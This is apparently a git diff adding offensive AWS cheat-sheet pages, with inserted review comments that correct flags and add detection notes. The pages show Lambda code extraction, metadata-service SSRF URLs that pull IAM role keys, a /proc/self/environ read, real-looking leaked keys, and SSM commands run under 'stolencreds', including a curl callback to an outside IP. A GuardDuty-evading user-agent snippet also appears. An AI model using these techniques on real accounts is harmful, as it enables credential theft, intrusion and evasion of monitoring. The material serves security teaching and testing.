+if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux
+ # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that...
+ self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
+```
diff --git a/docs/cloud/aws/aws-lambda.md b/docs/cloud/aws/aws-lambda.md
new file mode 100644
index 0000000..b923c7e
--- /dev/null
+++ b/docs/cloud/aws/aws-lambda.md
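Review bot: The `update-trail` options look misspelled: as far as I recall the CLI flags are `--no-include-global-service-events` (plural) and `--no-is-multi-region-trail`, and `--region=eu-west` is not a region name (`eu-west-1` etc.), so both commands fail as written and should be checked against `aws cloudtrail update-trail help`. The file is titled IOC & Detections but shows only the attacker side; the detection counterpart is that these calls appear as `DeleteTrail` and `UpdateTrail` CloudTrail management events and that GuardDuty has a `Stealth:IAMUser/CloudTrailLoggingDisabled` finding, which is the content a reader would expect under this heading. Likewise the GuardDuty section could name the finding the user-agent check is avoiding, `PenTest:IAMUser/KaliLinux` and its Parrot/Pentoo siblings. `Pacu bypass this problem` should read `Pacu bypasses this problem`.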
@@ -0,0 +1,15 @@
+# AWS - Lambda
+
+
+## Extract function's code
+
+```powershell
+aws lambda list-functions --profile uploadcreds
+aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
+wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
+```
+
+
+## References
+
+* [Getting shell and data access in AWS by chaining vulnerabilities - Appsecco - Riyaz Walikar - Aug 29, 2019](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
\ No newline at end of file
diff --git a/docs/cloud/aws/aws-metadata.md b/docs/cloud/aws/aws-metadata.md
new file mode 100644
index 0000000..83982b5
--- /dev/null
+++ b/docs/cloud/aws/aws-metadata.md
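Review bot: `wget` has no `--profile` option, so the third command in the code block fails as written; `Code.Location` from `get-function` is a presigned S3 URL that needs no AWS credentials, so the line should be `wget -O lambda-function.zip 'url-from-previous-query'` (quoted, because the presigned URL contains `&`), with a note that the link is short-lived (the API reference gives it roughly a ten-minute validity, to be confirmed). The same `get-function` response carries `Configuration.Environment.Variables`, which is where hard-coded secrets usually live, so a `--query 'Configuration.Environment'` line next to the code download would make the page more useful. For the detection side it is worth stating that `ListFunctions` and `GetFunction` are both CloudTrail management events.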
@@ -0,0 +1,103 @@
+# AWS - Metadata SSRF
+
+> AWS released additional security defences against the attack.
+
+:warning: Only working with IMDSv1.
+Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`.
+
+In order to use IMDSv2 you must provide a token.
+
+```powershell
+export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
+curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
+```
+
+
+## Method for Elastic Cloud Compute (EC2)
+
+Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
+
+1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/
+ ```powershell
+ ami-id
+ ami-launch-index
+ ami-manifest-path
+ block-device-mapping/
+ events/
+ hostname
+ iam/
+ identity-credentials/
+ instance-action
+ instance-id
+ ```
+2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/
+3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
+ ```powershell
+ {
+ "Code" : "Success",
+ "LastUpdated" : "2019-07-31T23:08:10Z",
+ "Type" : "AWS-HMAC",
+ "AccessKeyId" : "ASIA54BL6PJR37YOEP67",
+ "SecretAccessKey" : "OiAjgcjm1oi2xxxxxxxxOEXkhOMhCOtJMP2",
+ "Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv",
+ "Expiration" : "2019-08-01T05:20:30Z"
+ }
+ ```
+
+
+## Method for Container Service (Fargate)
+
+1. Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ
+ ```powershell
+ JAVA_ALPINE_VERSION=8.212.04-r0
+ HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root
+ AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447
+ AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2
+ ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd
+ ```
+2. Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447
+ ```powershell
+ {
+ "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role",
+ "AccessKeyId": "ASIA54BL6PJR2L75XHVS",
+ "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt",
+ "Token": "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",
+ "Expiration": "2019-09-18T04:05:59Z"
+ }
+ ```
+
+
+## AWS API calls that return credentials
+
+- chime:createapikey
+- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
+- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
+- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)
+- [cognito-identity:getcredentialsforidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html)
+- [connect:getfederationtoken](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html)
+- [connect:getfederationtokens](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html)
+- [ecr:getauthorizationtoken](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_GetAuthorizationToken.html)
+- [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_RequestUploadCredentials.html)
+- [iam:createaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html)
+- [iam:createloginprofile](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html)
+- [iam:createservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateServiceSpecificCredential.html)
+- [iam:resetservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ResetServiceSpecificCredential.html)
+- [iam:updateaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateAccessKey.html)
+- [lightsail:getinstanceaccessdetails](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetInstanceAccessDetails.html)
+- [lightsail:getrelationaldatabasemasteruserpassword](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetRelationalDatabaseMasterUserPassword.html)
+- [rds-db:connect](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html)
+- [redshift:getclustercredentials](https://docs.aws.amazon.com/redshift/latest/APIReference/API_GetClusterCredentials.html)
+- [sso:getrolecredentials](https://docs.aws.amazon.com/singlesignon/latest/PortalAPIReference/API_GetRoleCredentials.html)
+- [mediapackage:rotatechannelcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-credentials.html)
+- [mediapackage:rotateingestendpointcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-ingest_endpoints-ingest_endpoint_id-credentials.html)
+- [sts:assumerole](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html)
+- [sts:assumerolewithsaml](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-saml.html)
+- [sts:assumerolewithwebidentity](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html)
+- [sts:getfederationtoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-federation-token.html)
+- [sts:getsessiontoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-session-token.html)
+
+
+## References
+
+* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+* [Cloud security instance metadata - PumaScan - Eric Johnson - 09 Oct 2019](https://pumascan.com/resources/cloud-security-instance-metadata/)
\ No newline at end of file
diff --git a/docs/cloud/aws/aws-s3-bucket.md b/docs/cloud/aws/aws-s3-bucket.md
new file mode 100644
index 0000000..d4e6589
--- /dev/null
+++ b/docs/cloud/aws/aws-s3-bucket.md
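Review bot: The IMDSv2 enable command near the top of the hunk is not runnable: `--instance-id` and `--profile` are given no values and the option is `--http-tokens required` (plural), i.e. `aws ec2 modify-instance-metadata-options --instance-id <instance-id> --http-endpoint enabled --http-tokens required --profile <profile>`. The ":warning: Only working with IMDSv1" line should say why the token step defeats the SSRF shown below it: the token can only be obtained with a PUT request, and IMDSv2 refuses to issue one when the request carries an `X-Forwarded-For` header, so a GET-only SSRF relayed through a proxy never gets a token; `--http-put-response-hop-limit 1` additionally keeps the token from crossing a container network hop (both points to be confirmed against the current IMDS documentation). The Fargate sample output contains a real-looking account id and access key id; the EC2 sample partially masks its values, so either redact these the same way or state that they are copied from the referenced write-up. In the API list, `rds-db:connect` is an IAM action that gates database auth tokens rather than an API call that returns credentials, which is worth a short note since the heading promises the latter.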
@@ -0,0 +1,41 @@
+# AWS - S3 Buckets
+
+## Tools
+
+* [digi.ninja/bucket-finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled
+ ```powershell
+ wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
+ ./bucket_finder.rb my_words
+ ./bucket_finder.rb --region ie my_words
+ ./bucket_finder.rb --download --region ie my_words
+ ./bucket_finder.rb --log-file bucket.out my_words
+ ```
+
+* [aws-sdk/boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python
+ ```python
+ import boto3
+ s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1')
+
+ try:
+ result = s3.list_buckets()
+ print(result)
+ except Exception as e:
+ print(e)
+ ```
+
+* [nccgroup/s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files
+ ```powershell
+ $ python3 -m venv env && source env/bin/activate
+ $ pip install -r requirements.txt
+ $ python s3-objects-check.py -h
+ $ python s3-objects-check.py -p whitebox-profile -e blackbox-profile
+ ```
+
+
+##
+
+
+
+## References
+
+* []()
\ No newline at end of file
diff --git a/docs/cloud/aws/aws-ssm.md b/docs/cloud/aws/aws-ssm.md
new file mode 100644
index 0000000..ebc8aaa
--- /dev/null
+++ b/docs/cloud/aws/aws-ssm.md
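Review bot: The hunk ends with an empty `## ` heading and an empty `* []()` reference entry, which render as broken markup and should be filled in or dropped before the page is published. The boto3 example embeds a static `aws_access_key_id`/`aws_secret_access_key` pair in the call; even with the values redacted, a copy-pasteable snippet with inline keys invites committing real ones, so `boto3.client('s3', region_name='us-west-1')` with credentials taken from `AWS_PROFILE` or the environment is the safer example, and it would be consistent with the `-p whitebox-profile` usage two bullets later. A one-line note that `list_buckets` requires `s3:ListAllMyBuckets` would tell the reader why the call can fail with otherwise valid keys.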
@@ -0,0 +1,29 @@
+# AWS - SSM
+
+## Command execution
+
+:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
+
+SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
+
+* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
+* Windows Server 2016 and 2019
+* Amazon Linux
+* Amazon Linux 2
+* Ubuntu Server 16.04
+* Ubuntu Server 18.04
+* Amazon ECS-Optimized
+
+```powershell
+$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
+$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
+$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
+
+e.g:
+$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
+```
+
+
+## References
+
+* []()
\ No newline at end of file
diff --git a/docs/cloud/aws/aws-training.md b/docs/cloud/aws/aws-training.md
new file mode 100644
index 0000000..47c9993
--- /dev/null
+++ b/docs/cloud/aws/aws-training.md
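Review bot: The `## References` section at the end of the hunk holds only an empty `* []()` placeholder; the `send-command` examples appear to come from the same Appsecco write-up cited on the Lambda page, so that link belongs here. The `:warning:` about `ssm-user` sits under "Command execution" but is unrelated to `AWS-RunShellScript`, which the agent executes with its own (root/SYSTEM) privileges; if the intended point is that Session Manager creates an `ssm-user` with sudo rights that persists after the agent is removed, say that explicitly. The AMI list is dated (later Ubuntu and Windows Server images also ship the agent, to be checked against the current AWS list), and it would help to state the prerequisites: `ssm:SendCommand` on the caller and an instance profile with `AmazonSSMManagedInstanceCore` or equivalent on the target. For the detection side, `SendCommand` including its `commands` parameter is recorded in CloudTrail and, when output logging is configured, the command output lands in CloudWatch Logs or S3, so the `curl .../\`whoami\`` callback is fully visible to defenders.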
@@ -0,0 +1,8 @@
+# AWS - Training
+
+* [bishopfox/CloudFoxable](https://cloudfoxable.bishopfox.com/): A Gamified Cloud Hacking Sandbox
+* [ine-labs/AWSGoat](https://github.com/ine-labs/AWSGoat) : A Damn Vulnerable AWS Infrastructure
+* [m6a-UdS/dvca](https://github.com/m6a-UdS/dvca) - A demonstration project to show how to do privilege escalation on AWS
+* [nccgroup/sadcloud](https://github.com/nccgroup/sadcloud) - A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure
+* [0xdabbad00/Flaws](http://flaws.cloud) - Several level of challenges around AWS
+* [RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat) - "Vulnerable by Design" AWS deployment tool
\ No newline at end of file
diff --git a/docs/cloud/azure/azure-ad-connect.md b/docs/cloud/azure/azure-ad-connect.md
index ff9bfd7..2fc0d52 100644
--- a/docs/cloud/azure/azure-ad-connect.md
+++ b/docs/cloud/azure/azure-ad-connect.md
@@ -120,4 +120,5 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
 * [Azure AD Overview - John Savill's Technical Training - Oct 7, 2014](https://www.youtube.com/watch?v=l_pnNpdxj20)
 * [Windows Azure Active Directory in plain English - Openness AtCEE - Jan 9, 2014](https://www.youtube.com/watch?v=IcSATObaQZE)
 * [Azure AD connect for RedTeam - Adam Chester @xpnsec - 2019-02-18](https://blog.xpnsec.com/azuread-connect-for-redteam/)
-* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud)
\ No newline at end of file
+* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud)
+* [DUMPING NTHASHES FROM MICROSOFT ENTRA ID - Secureworks](https://www.secureworks.com/research/dumping-nthashes-from-microsoft-entra-id)
\ No newline at end of file